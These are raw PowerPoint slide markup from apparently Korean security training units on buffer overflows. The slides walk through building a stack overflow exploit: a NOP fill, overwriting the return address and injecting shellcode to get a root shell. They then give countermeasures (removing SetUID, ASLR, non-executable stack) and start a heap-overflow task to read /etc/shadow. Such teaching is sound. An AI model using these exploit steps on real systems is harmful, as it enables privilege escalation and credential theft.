              <a:tr h="395921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bof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진입 시점의 스택 구조는 다음과 같다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그러므로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buffer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버퍼의 크기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(24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 더 긴 문자열을 넘기면 복귀 주소를 변경시킬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59516" marR="59516" marT="16454" marB="164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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C72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948" y="2778157"/>
            <a:ext cx="3559973" cy="313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8688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1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5) /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 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6) /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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7) /sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 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./exploit 28</a:t>
            </a:r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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7D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" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="270207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70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC9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" t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="5118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72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450DC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8" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="70616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F384F-0013-4CBA-BB0F-60762091D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84023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="212013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147" marR="13147" marT="3635" marB="36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147" marR="13147" marT="3635" marB="36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084636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433982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먼저 페이로드를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NOP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채운다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memset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(&amp; buffer, 0x90, 517); //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nop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147" marR="13147" marT="3635" marB="36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effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>. 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effectLst/>
                        </a:rPr>
                        <a:t>복귀 주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>. 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effectLst/>
                        </a:rPr>
                        <a:t>즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>다음과 같은 페이로드가 준비된다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((long *) (buffer + off)) = (long) (buffer + off + 4);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147" marR="13147" marT="3635" marB="36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0631132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD67383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29" y="1876626"/>
            <a:ext cx="2298877" cy="310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4" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB0302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636" y="1876626"/>
            <a:ext cx="2298877" cy="310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824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8) /sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘 획득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./stack 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49CFF3B-8277-4780-B382-55D678306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393565"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26780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147" marR="13147" marT="3635" marB="36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084636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3756073"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effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다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memcpy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(buffer +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sizeof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(buffer) -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sizeof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(shellcode), shellcode,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sizeof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(shellcode))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3147" marR="13147" marT="3635" marB="36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025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5E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95" y="1396921"/>
            <a:ext cx="2277247" cy="307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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02A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5" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="5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AC1FD6-2A5F-46CF-AE10-D0CB522CC28D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 쉘을 획득한 상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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acheck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50036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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6642C97-AE41-486C-BE08-8D12FAF98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hlinkClick r:id="rId3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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4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쉘코드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실행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-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대응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/sec/stack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파일에는 스택 버퍼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취약점이 존재한다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스택 버퍼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오버플로우를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통해 쉘 코드가 실행되지 않도록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대응하시오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test / test123</a:t>
            </a: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 접근 권한 변경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chmod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접근권한 파일명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2) ASLR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sysctl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-w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kernel.randomize_va_space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스택 실행 방지 설정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execstack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-c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파일명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Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139A787F-55D9-4280-A8E7-48BDE3B12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9C3DFF4-2FD7-4BB3-B403-C968BA8BCA13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9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95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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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95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취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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쉘코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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주입 및 실행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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95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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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취약점을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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쉘코드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주입 공격에 대응할 수 있다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5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D80CE4A-C2E9-4560-8E50-EB848B2EAE7C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C3017B1-DBDF-418B-BC4C-BD9FA0CFACFC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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DE2446-C02B-47FA-9538-513B519A1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4D0FFD-0653-4F8F-8056-CFE9FBC86D85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(CentOS 5.11, 32-bit)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42146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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을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ls –l /sec/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> u-s /sec/stack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ls –l /sec/stack* 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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>활성화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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>=2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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 실행 방지 설정 및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execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c /sec/stack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execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –q /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C7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833966"/>
            <a:ext cx="4727194" cy="5410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86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B0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11" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="641521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CA759F0-00FE-4ADB-B599-D6E8C0B17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462405"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353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1163277480"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2340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118803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="201225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SetUID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 해제 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stack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실행하면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쉘코드가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실행되기는 하지만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root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권한이 아닌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stack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실행한 계정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아래 그림의 경우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권한을 가지는 쉘이 나타난다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816622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295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19" y="3671797"/>
            <a:ext cx="4779963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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40C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52" y="5773673"/>
            <a:ext cx="4983480" cy="55626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78BD65-C113-4787-9C38-CB1A8A9FE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537457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="3174175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1956352289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156180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="268668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ASLR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활성화 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stack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실행하면 실행시마다 주소가 변경되어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쉘코드가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실행되지 않는다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써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쉘코드를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실행시킬 수도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149480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA946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" t="325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="176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90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE82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2989" y="4521813"/>
            <a:ext cx="4503420" cy="54102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90521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C4553F-CF47-4982-BAED-66DAB834C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087457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="2930335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862917401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16968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252044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스택 실행 방지 설정 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stack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실행하면 스택 내에 존재하는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쉘코드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자체의 실행이 불가능하게 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416208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96F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60" y="1311503"/>
            <a:ext cx="4770438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E17C4A-3B31-4DDC-AF8F-C53104642EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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check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51460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FB783FB6-F004-4D8A-9A51-99B6118E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/Intro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해킹 관련 영상</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4940BB54-D4E6-4689-9291-3F6BA3ACED57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5B9977C2-3518-44F2-B5FC-D27847E332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6580265"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2067339" y="2014453"/>
          <a:ext cx="8213698" cy="3275070"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3784821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="747423">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3549310020"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="265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링크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내용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비고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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2651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3" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=IS3UpC121bI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/>
                        <a:t>어나니머스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 란 어떤 집단인가</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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지식</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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585991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2651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4" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=GisH2IQgob8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해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> vs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>남과북</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>]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유머</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/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651176"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265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5" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=XGWP7v0OzTI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미드웨이 해전 암호해독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전쟁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133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6" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=DkySqacKXlU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사이버사령부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국방망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악성코드 침투사례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사고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401460"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2168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7" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=gmt_mmo30Js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북한 사이버테러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3.20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전산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사고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7044283"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1873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8" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=CVDDmotEmvI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사이버전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–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미군 말하는 사이버전의 위력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지식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3493698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1579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9" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=nfOLhuNwfI0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북한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–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코로나 제약회사 해킹공격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지식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839265"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="12844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10" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=ynrsAtAlHqo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북한의 엄청난 해킹능력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소비에트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지식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899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11" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=o4dCzqy1JrY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영화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-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에니그마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해독 장면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유머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지식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258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927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108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782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0036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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF -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힙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/sec/bof64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파일에 존재하는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버퍼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취약점을 이용하여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/shadow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파일의 내용을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출력하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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test / test123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BOF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BOF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취약점에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(CentOS)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97882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sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) /sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –l heap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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>goodfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
